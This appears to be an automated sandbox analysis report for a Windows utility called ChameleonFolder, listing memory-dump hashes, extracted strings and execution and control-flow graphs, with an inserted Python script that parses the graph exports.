                                                                                                            • Instruction ID: 252ac4e0efd8ef72324bf925d9923e10b0aff9fd4ffb540c1bff3a36c796326d
                                                                                                            • Opcode Fuzzy Hash: 9ffa8f6840436782e90293cc4e9ef60cd837807f8c50a00da7ed89d8e997bbcd
                                                                                                            • Instruction Fuzzy Hash: 33513775E40308AFDB04EFB5D881BAE7BE8EB19705F51442BF810EF246EB7599108B58
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003451000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03451000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3451000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                                                            • API String ID: 0-3496071916
                                                                                                            • Opcode ID: 2c52150e95b41c4c6be8db06202e81faabf7c00fbc5bad30996c7e1d18b0c19e
                                                                                                            • Instruction ID: c8041b37b38fd4c990cb8d123e86ab11fe6744e0976ead8c221d58f98856410a
                                                                                                            • Opcode Fuzzy Hash: 2c52150e95b41c4c6be8db06202e81faabf7c00fbc5bad30996c7e1d18b0c19e
                                                                                                            • Instruction Fuzzy Hash: C8513579E40308BEEB11EA95CC41FAEB7BCEB18704F540567BE14EE583DA709A50CA58
                                                                                                            Strings
                                                                                                            • {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}, xrefs: 034E9BB2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}
                                                                                                            • API String ID: 0-4124573863
                                                                                                            • Opcode ID: 152dfc6f52c6fe7da12b0caf8b2ecff00cc7e7619b61ff2cca34e7fca2d7fb5f
                                                                                                            • Instruction ID: 2eb725f57dcb3be7439da1e5781b93dede907360c62b91664b942bad94d634d7
                                                                                                            • Opcode Fuzzy Hash: 152dfc6f52c6fe7da12b0caf8b2ecff00cc7e7619b61ff2cca34e7fca2d7fb5f
                                                                                                            • Instruction Fuzzy Hash: 74218EB8645300AFE791FFA9D885B1577E4EB4A721F18815AF510EF3E4C774A880CB19
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5ada3c8c950941fbf2a4b36e552d33f9bfb87caf017487ddfdef70e1f6d3fac7
                                                                                                            • Instruction ID: 817d458fc4f500d5259e0e7a667e3fd483fdc3364d4f495510a0bce34aac80c8
                                                                                                            • Opcode Fuzzy Hash: 5ada3c8c950941fbf2a4b36e552d33f9bfb87caf017487ddfdef70e1f6d3fac7
                                                                                                            • Instruction Fuzzy Hash: 2E617275A04318AFDB10EFA5D89099E7BF9EB59310F5244AAF814EF250D738DA50CF18
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003451000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03451000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3451000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7748e1fdcb530c83941eb6f08f5a8c1c6ee6ea46d890112c86f3465b65b6cba1
                                                                                                            • Instruction ID: 6b1cc9e3e918e8e73febd919a935dd42a9895cfd07a52ea3d437ef66e0728a33
                                                                                                            • Opcode Fuzzy Hash: 7748e1fdcb530c83941eb6f08f5a8c1c6ee6ea46d890112c86f3465b65b6cba1
                                                                                                            • Instruction Fuzzy Hash: A65153759007448FDB20EF6AC48875ABBE4EB09314F1945AFFC099F34ACB799884CB19
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003451000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03451000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3451000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7290b42011e70f839895acb9a42d1f97ee8b3bd314baf1a9f47484e75fe7c762
                                                                                                            • Instruction ID: 686ff756a9d26af4fad3e1a7b16bebd40a5e31c91f58953fffdddf0c1fe4f983
                                                                                                            • Opcode Fuzzy Hash: 7290b42011e70f839895acb9a42d1f97ee8b3bd314baf1a9f47484e75fe7c762
                                                                                                            • Instruction Fuzzy Hash: DD312F74E002199FDB11EF99C880BAEB7B5EB44300F54466BF800AF352DB749D85CB59
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003451000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03451000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3451000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7e1004d4178015379abbe27c54554ebae7982e49185e3609e2138eeebf119bdd
                                                                                                            • Instruction ID: 9d2c7a405e310617da21adbb6a824cbe05089c30c549954b25283bf95d5ab53a
                                                                                                            • Opcode Fuzzy Hash: 7e1004d4178015379abbe27c54554ebae7982e49185e3609e2138eeebf119bdd
                                                                                                            • Instruction Fuzzy Hash: 4D117534E002089FDB51EF69C8D095DBBF9EB48600B5441BBFC15DF352DB709D458A18
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003451000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03451000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3451000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2e10703e078a8075ac38df315f854a2d47addf897ec49a34f66674d257e916ac
                                                                                                            • Instruction ID: 8f10ba7861005a839ee66e8d8679ba4f1911e4b225fb1a502ee3c96631607ea9
                                                                                                            • Opcode Fuzzy Hash: 2e10703e078a8075ac38df315f854a2d47addf897ec49a34f66674d257e916ac
                                                                                                            • Instruction Fuzzy Hash: 6C118178E003099FDF45EF95C881AAEB7B8EF45300F50417ABD05AF252DB705E04D629
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003451000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03451000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3451000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c95e2b90a9ce0ee879b172b0913182987224919b0cae40f4e19bd19b20767289
                                                                                                            • Instruction ID: 740c2d7f394243852c3a59a290dc0b66d37dcfb6220daa7b5c5c30962dedd565
                                                                                                            • Opcode Fuzzy Hash: c95e2b90a9ce0ee879b172b0913182987224919b0cae40f4e19bd19b20767289
                                                                                                            • Instruction Fuzzy Hash: 1F113D35E4431C9FDB15EB54C885BDDB7B8EB04700F5141BAF908AE292DA749E84CE68
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1ad15d8decf3f3d50a7ea5df568876ac2597eb6e51ee3a3232ac7f643054aaf6
                                                                                                            • Instruction ID: fc388227c66e1b985f59c53ef67b376f80631ccde26c1a4417b1c67be61d33a5
                                                                                                            • Opcode Fuzzy Hash: 1ad15d8decf3f3d50a7ea5df568876ac2597eb6e51ee3a3232ac7f643054aaf6
                                                                                                            • Instruction Fuzzy Hash: 67110A74A40308AFDB50EEA4D881F6A73E9EB19701F08415AA904EF395D778E950CBA9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9cc376453ec3ed48dbca040bb652fa479c39dba5b26913345deec295b0b3da69
                                                                                                            • Instruction ID: 1fae89679d189c3a8376b10c3a796ffc6d525fb16e95dc7f860db75b998eed1d
                                                                                                            • Opcode Fuzzy Hash: 9cc376453ec3ed48dbca040bb652fa479c39dba5b26913345deec295b0b3da69
                                                                                                            • Instruction Fuzzy Hash: 8D1140B9A00208EFCB40DF9CD880E9A77ECEB4D250B048545F918DF354C334ED509B64
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003451000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03451000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3451000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 01fab52cbb4d33ed30ad8ebd7c3111c679ae1de4cb386cb4197d0c5357cc27f8
                                                                                                            • Instruction ID: a981751f89571d9152194317ab89e6f8e43f8f8c7bba00724aa1bb389aad5a84
                                                                                                            • Opcode Fuzzy Hash: 01fab52cbb4d33ed30ad8ebd7c3111c679ae1de4cb386cb4197d0c5357cc27f8
                                                                                                            • Instruction Fuzzy Hash: 28F074B6704218BF9B44DE9DDC80D9F77ECEB4D2A0B054169FA08E7201D634ED108BA4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003451000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03451000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            • String ID: AMPM$2$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                            Strings
                                                                                                            • ERROR GetDialogPath: QueryActiveShellView fail: , xrefs: 034E8455
                                                                                                            • ERROR GetDialogPath: IFolderView not found, xrefs: 034E8490
                                                                                                            • ERROR GetDialogPath: GetCurFolder fail: , xrefs: 034E8532
                                                                                                            • ERROR GetDialogPath: ShellBrowser fail, xrefs: 034E840D
                                                                                                            • ERROR GetDialogPath: GetFolder fail: , xrefs: 034E84E2
                                                                                                            • error, xrefs: 034E83D1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ERROR GetDialogPath: GetCurFolder fail: $ERROR GetDialogPath: GetFolder fail: $ERROR GetDialogPath: IFolderView not found$ERROR GetDialogPath: QueryActiveShellView fail: $ERROR GetDialogPath: ShellBrowser fail$error
                                                                                                            • API String ID: 0-1686640291
                                                                                                            • Opcode ID: 2b938aaac00dfd9ae4f186fb3659b85684e3e60c2a448d55ee100e9882d2b7a1
                                                                                                            • Instruction ID: 62726e507f7bbfd2e54a2d6aa88f4b289ae4110bc7709083973e9b43c25dbe21
                                                                                                            • Opcode Fuzzy Hash: 2b938aaac00dfd9ae4f186fb3659b85684e3e60c2a448d55ee100e9882d2b7a1
                                                                                                            • Instruction Fuzzy Hash: 53516035A042099FDF45DFA5D9509AEB7F4FF44711F6040AAE810AF251EB349E05CB28
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: #32770$ComboBox$ComboBoxEx32$DUIViewWndClassName$Edit$ShellDll_DefView
                                                                                                            • API String ID: 0-2731451753
                                                                                                            • Opcode ID: e11db74aa20667cd10442b81018d9a2fb92825bf31c73f78763c0f14573392bc
                                                                                                            • Instruction ID: b956b9cd5306343fb334d8b453c2eb44ee556cadf1b8364438dd392a942e1162
                                                                                                            • Opcode Fuzzy Hash: e11db74aa20667cd10442b81018d9a2fb92825bf31c73f78763c0f14573392bc
                                                                                                            • Instruction Fuzzy Hash: CC312534F40359AEFF10D7E99C85F9EBFA89F15621F140096BA10AF6C2D6759A00CB6C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (basic) procedure $class $constructor $destructor $operator
                                                                                                            • API String ID: 0-1628623062
                                                                                                            • Opcode ID: d01b23878540d82b40bc75317a239584f412023fd0ec341bcf173f61bd6071f1
                                                                                                            • Instruction ID: 7f5cb12c8c0505e90d7af6dc3251f16bd438df6ab6deb7a25c86a9b6cdd5c0ef
                                                                                                            • Opcode Fuzzy Hash: d01b23878540d82b40bc75317a239584f412023fd0ec341bcf173f61bd6071f1
                                                                                                            • Instruction Fuzzy Hash: 2461FB38B002059FEF00DF99C884A9EBBB5FF49210B5440AEE805AF355DB35ED46CB55
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: A/P$AAA$AAAA$AM/PM$AMPM
                                                                                                            • API String ID: 0-3831542625
                                                                                                            • Opcode ID: 2cc3ac9a81681c0c44cb284f3f8ab1243b4b5cfd18b64c947bdbfcb0675a998f
                                                                                                            • Instruction ID: d607849937a670de5f43b6d64fe883bea03c29fb7a5e2f234ff41f849d4cc060
                                                                                                            • Opcode Fuzzy Hash: 2cc3ac9a81681c0c44cb284f3f8ab1243b4b5cfd18b64c947bdbfcb0675a998f
                                                                                                            • Instruction Fuzzy Hash: C141A0756042089FDB04DF59C844AAE77AABF44314F14805BE8099F390C7B8DD86CB6B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Any$Array $ByRef $String$UnicodeString
                                                                                                            • API String ID: 0-2617011621
                                                                                                            • Opcode ID: 1a55750e9e981e95fc03b563de08269f08104781d9776d9c88c1b13bed51e962
                                                                                                            • Instruction ID: d746e21c45b593f01afbfae4248e45d2eb5267954e8748f23472667188c7c2b3
                                                                                                            • Opcode Fuzzy Hash: 1a55750e9e981e95fc03b563de08269f08104781d9776d9c88c1b13bed51e962
                                                                                                            • Instruction Fuzzy Hash: A321E738B043049FD710EA59C8007FABFAAEB89600FE94167BD649F386DA709D01C69D
                                                                                                            Strings
                                                                                                            • ERROR GetPathFromPIDL: GetDisplayName fail: , xrefs: 034E7FB2
                                                                                                            • error, xrefs: 034E7EFC
                                                                                                            • ERROR GetPathFromPIDL: SHCreateItemFromIDList fail: , xrefs: 034E7F59
                                                                                                            • ERROR GetPathFromPIDL: SHGetPathFromIDList fail: , xrefs: 034E8006
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ERROR GetPathFromPIDL: GetDisplayName fail: $ERROR GetPathFromPIDL: SHCreateItemFromIDList fail: $ERROR GetPathFromPIDL: SHGetPathFromIDList fail: $error
                                                                                                            • API String ID: 0-4188884885
                                                                                                            • Opcode ID: 36b502b74c6779c99262ba72c149993d54fef038620084c21826426134543280
                                                                                                            • Instruction ID: c5ce7ac62409533bff0a20f5c9c7ca9bd5852c87dc00efd4ede5daeae0a7b8e4
                                                                                                            • Opcode Fuzzy Hash: 36b502b74c6779c99262ba72c149993d54fef038620084c21826426134543280
                                                                                                            • Instruction Fuzzy Hash: 60411C34D013099FCF54EBA5D884AAEBBB8EF49201F1141AAE814AF350DB349F45CF59
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: False$Null$True$nil
                                                                                                            • API String ID: 0-1063864068
                                                                                                            • Opcode ID: e56165772af93f89cbf7934f7e9865c6d9a5e4d9975a564c87148c5757b3c8a3
                                                                                                            • Instruction ID: 099046cbf4a0723a9154cfdef929ba969c03ea3509d2d368e9dff763da69c2ba
                                                                                                            • Opcode Fuzzy Hash: e56165772af93f89cbf7934f7e9865c6d9a5e4d9975a564c87148c5757b3c8a3
                                                                                                            • Instruction Fuzzy Hash: FA21AF1531871A579E14E9BB1DB026F42895F4A0947181C7BFD21CFF0AEBD5C847436E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: -$.$>$Owner
                                                                                                            • API String ID: 0-4224991809
                                                                                                            • Opcode ID: b20d6fd611a68b74fd1b1106736291884529317fe1cb842f382a474c06bbd328
                                                                                                            • Instruction ID: cff43d7081d552e97bbeada10faf58326d01a83c683f142bf03567820c816a04
                                                                                                            • Opcode Fuzzy Hash: b20d6fd611a68b74fd1b1106736291884529317fe1cb842f382a474c06bbd328
                                                                                                            • Instruction Fuzzy Hash: 4931A639E242D49FCFA1DB65C84126EF7B9EB05211F1841AFD891AF381E7749EC08B49
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: False$Null$True$nil
                                                                                                            • API String ID: 0-1063864068
                                                                                                            • Opcode ID: 488fc695bc43fc7ffee229180347fe1e6c1287467368c278b320ccddf4f2a19c
                                                                                                            • Instruction ID: 0315ef8205fcd1b082cfe07893fa07fd7c5fa74f6f0f5d887ade6791806d9fb7
                                                                                                            • Opcode Fuzzy Hash: 488fc695bc43fc7ffee229180347fe1e6c1287467368c278b320ccddf4f2a19c
                                                                                                            • Instruction Fuzzy Hash: 1621073C720388AFCB41EBA59C9065D76AADB49600F1040BBF805DF346D678EE0A875E

                                                                                                            Execution Graph

                                                                                                             Execution Coverage: 55.4%
                                                                                                             Dynamic/Decrypted Code Coverage: 100%
                                                                                                             Signature Coverage: 0%
                                                                                                             Total number of Nodes: 23
                                                                                                             Total number of Limit Nodes: 3
                                                                                                             execution_graph (23 nodes, 29 edges; node id, address, API calls, successors)
                                                                                                             • 1499 2268090 -> 1500, 1501
                                                                                                             • 1500 226811b -> none
                                                                                                             • 1501 22680a6 -> 1500, 1503
                                                                                                             • 1503 2268030 CreateThread SetThreadPriority ResumeThread -> 1500, 1504
                                                                                                             • 1504 2267fa0 -> 1505, 1506
                                                                                                             • 1505 2267fb8 SetWindowsHookExW -> 1506
                                                                                                             • 1506 2267fe4 -> none
                                                                                                             • 1521 2267f90 -> 1522
                                                                                                             • 1522 2267fa0 -> 1523, 1524
                                                                                                             • 1523 2267fb8 SetWindowsHookExW -> 1524
                                                                                                             • 1524 2267fe4 -> none
                                                                                                             • 1507 21ae300 -> 1508, 1510
                                                                                                             • 1508 21ae321 -> 1509, 1510
                                                                                                             • 1509 21ae3a9 GetNativeSystemInfo -> 1510
                                                                                                             • 1510 21ae3b5 -> none
                                                                                                             • 1511 226e9c8 -> 1513
                                                                                                             • 1513 22737e8 -> 1512, 1515
                                                                                                             • 1512 2273b62 -> none
                                                                                                             • 1515 22682b0 -> 1516, 1520
                                                                                                             • 1516 22682ca -> 1517, 1520
                                                                                                             • 1517 22682d2 CreateFileMappingW -> 1518, 1520
                                                                                                             • 1518 2268326 MapViewOfFile -> 1520
                                                                                                             • 1520 2268313 -> 1512
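The report exports each execution graph and control-flow graph as a single flat token stream: a graph name, then `<id> <address>` node declarations (any following non-numeric words, such as API names or `call <addr>`, are labels of that node) and `<src>-><dst>` edges. The script below is an added example written for this page, not Joe Sandbox code; the grammar is inferred from the graphs printed in this report. It rebuilds the stream into an adjacency structure, checks the parsed node count against the "Total number of Nodes" figure the report prints above the graph, and lists the sequence of API calls met along each path from an entry node. The two sample inputs are the execution graph of process 12 (ChameleonFolder64) and the control-flow graph of the function at 22682b0, copied from this report.

```python
"""Rebuild a Joe Sandbox graph export from its flat token stream.

Added example for this page, not Joe Sandbox code.  The report prints each
execution / control-flow graph as one line: a name, then "<id> <addr>" node
declarations (following non-numeric words such as API names or "call <addr>"
are that node's labels) and "<src>-><dst>" edges.  Grammar inferred from the
graphs printed in the report.
"""
import re
from collections import defaultdict

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")

# Sample inputs copied from this report: the execution graph of process 12
# (ChameleonFolder64) and the control-flow graph of the function at 22682b0.
EXEC_GRAPH = (
    "execution_graph 1499 2268090 1500 226811b 1499->1500 1501 22680a6 1499->1501 1501->1500 "
    "1503 2268030 CreateThread SetThreadPriority ResumeThread 1501->1503 1503->1500 1504 2267fa0 "
    "1503->1504 1505 2267fb8 SetWindowsHookExW 1504->1505 1506 2267fe4 1504->1506 1505->1506 "
    "1521 2267f90 1522 2267fa0 1521->1522 1523 2267fb8 SetWindowsHookExW 1522->1523 1524 2267fe4 "
    "1522->1524 1523->1524 1507 21ae300 1508 21ae321 1507->1508 1510 21ae3b5 1507->1510 "
    "1509 21ae3a9 GetNativeSystemInfo 1508->1509 1508->1510 1509->1510 1511 226e9c8 1513 22737e8 "
    "1511->1513 1512 2273b62 1513->1512 1515 22682b0 1513->1515 1516 22682ca 1515->1516 "
    "1520 2268313 1515->1520 1517 22682d2 CreateFileMappingW 1516->1517 1516->1520 1518 2268326 "
    "MapViewOfFile 1517->1518 1517->1520 1518->1520 1520->1512"
)
REPORTED_NODES = 23  # the report's "Total number of Nodes" for this graph
CFG_22682B0 = (
    "control_flow_graph 248 22682b0-22682c4 249 22682ca-22682cc 248->249 250 226839b-22683a6 248->250 "
    "251 22682d2-2268311 CreateFileMappingW 249->251 252 22683d8-22683dd 249->252 253 22683b7-22683c2 "
    "250->253 254 22683a8-22683b0 250->254 257 2268326-2268369 MapViewOfFile 251->257 258 2268313-2268321 "
    "251->258 255 22683c4-22683cc 253->255 256 22683d3 253->256 254->253 255->256 256->252 260 2268394 "
    "257->260 261 226836b-226838d 257->261 258->252 263 2268399 260->263 261->260 263->252"
)


def parse_graph(line):
    """Return (name, nodes, edges); nodes maps id -> {"addr", "labels"}."""
    tokens = line.split()
    name, tokens = tokens[0], tokens[1:]
    nodes, edges, current, prev, i = {}, [], None, None, 0
    while i < len(tokens):
        tok = tokens[i]
        nxt = tokens[i + 1] if i + 1 < len(tokens) else None
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
        elif prev != "call" and tok.isdigit() and nxt and ADDR_RE.match(nxt):
            # "<id> <addr>" opens a node; the operand after "call" is a
            # label and must not be taken for a node id.
            current = int(tok)
            nodes[current] = {"addr": nxt, "labels": []}
            prev, i = nxt, i + 2
            continue
        elif current is None:
            raise ValueError("label %r before any node" % tok)
        else:
            nodes[current]["labels"].append(tok)
        prev, i = tok, i + 1
    return name, nodes, edges


def apis_of(node):
    """Label words minus 'call <addr>' pairs, i.e. only the API names."""
    words = node["labels"]
    return [w for k, w in enumerate(words)
            if w != "call" and (k == 0 or words[k - 1] != "call")]


def api_paths(nodes, edges, start):
    """Distinct API-name sequences along simple paths from `start` to a node
    with no unvisited successor, in first-discovery order."""
    succ = defaultdict(list)
    for src, dst in edges:
        succ[src].append(dst)
    found, seen = [], set()

    def walk(node, trail, visited):
        trail = trail + apis_of(nodes[node])
        pending = [n for n in succ[node] if n not in visited]
        if not pending and tuple(trail) not in seen:
            seen.add(tuple(trail))
            found.append(trail)
        for nxt in pending:
            walk(nxt, trail, visited | {nxt})

    walk(start, [], {start})
    return found


def summarize(line, reported_nodes=None):
    """Counts, entry nodes (no incoming edge) and the non-empty API sequences
    reachable from each; `count_ok` checks the node count against the report."""
    name, nodes, edges = parse_graph(line)
    targets = {dst for _, dst in edges}
    entries = sorted(n for n in nodes if n not in targets)
    result = {"name": name, "nodes": len(nodes), "edges": len(edges),
              "roots": entries,
              "api_paths": {r: [p for p in api_paths(nodes, edges, r) if p]
                            for r in entries}}
    if reported_nodes is not None:
        result["count_ok"] = len(nodes) == reported_nodes
    return result
```

`summarize(EXEC_GRAPH, REPORTED_NODES)` reports 23 nodes and 29 edges with `count_ok` true, four entry nodes (1499, 1507, 1511, 1521), and for entry 1499 the sequence CreateThread, SetThreadPriority, ResumeThread followed by SetWindowsHookExW, which is exactly the chain the graph above draws. The count check is worth keeping when these lines are scraped from many reports: a graph line cut short by extraction parses without error but no longer matches the report's own node total.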
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.2928739049.000000000226C000.00000020.00000001.01000000.00000011.sdmp, Offset: 0226C000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_226c000_ChameleonFolder64.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f87f73ee555d19d349671ab8061e292d9ec59dfe8dd1c2d20883c447361bf585
                                                                                                            • Instruction ID: 0fae1880affc0ed1d5b0b3aa7df7c3444f711a93ffbd790a8a413860f5bd509d
                                                                                                            • Opcode Fuzzy Hash: f87f73ee555d19d349671ab8061e292d9ec59dfe8dd1c2d20883c447361bf585
                                                                                                            • Instruction Fuzzy Hash: 39E3319046EBF24FCB1347B889AA1E17FB5DD0760470999C7C0D1CF4B7D918A91BA32A

                                                                                                            Control-flow Graph

                                                                                                             control_flow_graph 22682b0 (14 basic blocks; block id, address range, API calls, successors)
                                                                                                             • 248 22682b0-22682c4 -> 249, 250
                                                                                                             • 249 22682ca-22682cc -> 251, 252
                                                                                                             • 250 226839b-22683a6 -> 253, 254
                                                                                                             • 251 22682d2-2268311 CreateFileMappingW -> 257, 258
                                                                                                             • 252 22683d8-22683dd -> none
